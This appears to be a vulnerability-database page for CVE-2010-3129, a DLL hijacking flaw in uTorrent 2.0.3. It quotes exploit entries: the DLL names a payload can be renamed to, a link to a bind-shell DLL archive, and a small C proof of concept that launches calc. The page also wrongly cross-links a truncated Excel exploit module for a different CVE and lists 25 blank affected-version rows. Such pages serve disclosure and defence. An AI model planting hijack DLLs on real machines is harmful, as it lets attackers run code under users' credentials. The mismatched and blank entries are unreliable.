CVE-2010-3129
published 2010-08-26CVE-2010-3129: Untrusted search path vulnerability in uTorrent 2.0.3 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL…
PriorityP348critical9.3CVSS 2.0
AVNACMAuNCCICAC
EXPLOIT
EPSS
7.26%
93.6th percentile
Untrusted search path vulnerability in uTorrent 2.0.3 and earlier allows local users, and possibly remote attackers, to execute arbitrary code and conduct DLL hijacking attacks via a Trojan horse plugin_dll.dll, userenv.dll, shfolder.dll, dnsapi.dll, dwmapi.dll, iphlpapi.dll, dhcpcsvc.dll, dhcpcsvc6.dll, or rpcrtremote.dll that is located in the same folder as a .torrent or .btsearch file.
Affected
25 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
| utorrent | utorrent | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)
exploitdb·2010-09-25
CVE-2009-3129 Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)
Microsoft Excel - Malformed FEATHEADER Record (MS09-067) (Metasploit)
---
##
# $Id: ms09_067_excel_featheader.rb 10477 2010-09-25 11:59:02Z mc $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'rex/ole'
class Metasploit3 'Microsoft Excel Malformed FEATHEADER Record Vulnerability',
'Description' => %q{
This module exploits a vulnerability in the handling of the FEATHEADER record
by Microsoft Excel. Revisions of Office XP and later prior to the release of the
MS09-067 bulletin are vulnerable.
When processing a FEATHEADER (Shared Feature) record, Micros
Exploit-DB
μTorrent (uTorrent) 2.0.3 - DLL Hijacking
exploitdb·2010-08-25
CVE-2010-3129 μTorrent (uTorrent) 2.0.3 - DLL Hijacking
μTorrent (uTorrent) 2.0.3 - DLL Hijacking
---
###########################################################################
#
# Title: uTorrent <=2.0.3 Dll Hijacking Local Exploits
# By: Dr_IDE
# Tested: Windows 7RC
# Note: These are additional DLL's with unsafe Load Paths
# Reference: http://www.exploit-db.com/exploits/14726/
#
############################################################################
If the payload .DLL file is renamed to any of these files and placed in the
utorrent.exe directory, the payload will be executed with users' credentials.
-userenv.dll
-shfolder.dll
-dnsapi.dll
-dwmapi.dll
-iphlpapi.dll
-dhcpcsvc.dll
-dhcpcsvc6.dll
-rpcrtremote.dll
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz
Exploit-DB
μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking
exploitdb·2010-08-24
CVE-2010-3129 μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking
μTorrent (uTorrent) 2.0.3 - 'plugin_dll.dll' DLL Hijacking
---
/*
Exploit Title: uTorrent
#define DLLIMPORT __declspec (dllexport)
DLLIMPORT void hook_startup() { evil(); }
int evil()
{
WinExec("calc", 0);
exit(0);
return 0;
}
No writeups or analysis indexed.
http://secunia.com/advisories/41051http://www.exploit-db.com/exploits/14726http://www.exploit-db.com/exploits/14748http://www.vupen.com/english/advisories/2010/2164https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6887http://secunia.com/advisories/41051http://www.exploit-db.com/exploits/14726http://www.exploit-db.com/exploits/14748http://www.vupen.com/english/advisories/2010/2164https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A6887
2010-08-26
Published